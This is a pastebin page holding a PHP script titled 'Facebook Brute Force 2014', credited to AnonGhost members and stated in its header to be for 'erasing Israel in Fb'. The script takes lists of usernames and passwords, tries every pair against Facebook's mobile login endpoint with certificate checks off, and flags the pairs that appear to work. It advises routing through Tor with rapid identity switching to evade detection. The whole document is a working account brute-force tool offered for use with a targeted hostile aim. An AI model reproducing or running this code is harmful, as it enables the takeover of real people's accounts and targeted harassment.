Untitled


SUBMITTED BY: Guest

DATE: Sept. 23, 2014, 3:14 a.m.

FORMAT: Text only

SIZE: 3.6 kB

HITS: 1272

  1. <?php
  2. ob_start();
  3. @set_time_limit(0);
  4. #################################################
  5. #---------------------------------------------- #
  6. # Facebook Brute Force 2014 #
  7. #Coded by : Mauritania Attacker&Noname-Haxor #
  8. #Greetz : All AnonGhost Members #
  9. #This Tool Is For Erasing Israel in Fb #
  10. # --------------------------------------------- #
  11. #################################################
  12. echo "
  13. <head>
  14. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  15. <form method='POST'>
  16. <title>Facebook Brute Force 2014</title>
  17. </head>
  18. <style>
  19. textarea {
  20. resize:none;
  21. color: #1975FF ;
  22. border:1px solid #1975FF ;
  23. border-left: 4px solid #1975FF ;
  24. }
  25. input {
  26. color: ##33CCFF;
  27. border:1px dotted #33CCFF;
  28. }
  29. </style>";
  30. echo "
  31. <body text='#FFFFFF' background='http://i.imgur.com/yMmSxgU.jpg'>
  32. <center><img src='http://i.imgur.com/Vl2suSf.gif'></center>
  33. <center>Don't use this script without TOR BROWSER + TOR SWITCHER (set up the interval seconds from TOR SWITCHER TO 2 SECONDS)</center>
  34. <p dir='ltr' align='center'>
  35. <textarea cols='22' class='area' rows='14' name='username'></textarea>
  36. <textarea cols='22' class='area' rows='14' name='password'></textarea><br>
  37. <br>
  38. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  39. if(isset($_POST['scan'])){
  40. #To Put Proxy SOCKS V5
  41. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  42. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  43. function brute($user,$pass){
  44. $ch = curl_init();
  45. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  46. curl_setopt($ch, CURLOPT_HEADER, 0);
  47. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  48. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  49. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  50. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  51. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  52. $login = curl_exec($ch);
  53. //print_r($login);
  54. $check = (eregi('class="s t i u"',$login)) ? true:false;
  55. if($check == true){
  56. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  57. }else{
  58. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  59. }
  60. }
  61. $username = explode("\n", $_POST['username']);
  62. $password = explode("\n", $_POST['password']);
  63. foreach($username as $users) {
  64. $users = @trim($users);
  65. foreach($password as $pass) {
  66. $pass = @trim($pass);
  67. echo brute($users,$pass);
  68. }
  69. }
  70. }
  71. echo"<br>
  72. <br>
  73. <br>
  74. <br>
  75. <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded by: Mauritania Attacker&Noname-Hax0r</font></b></p></center>";
  76. ?>

comments powered by Disqus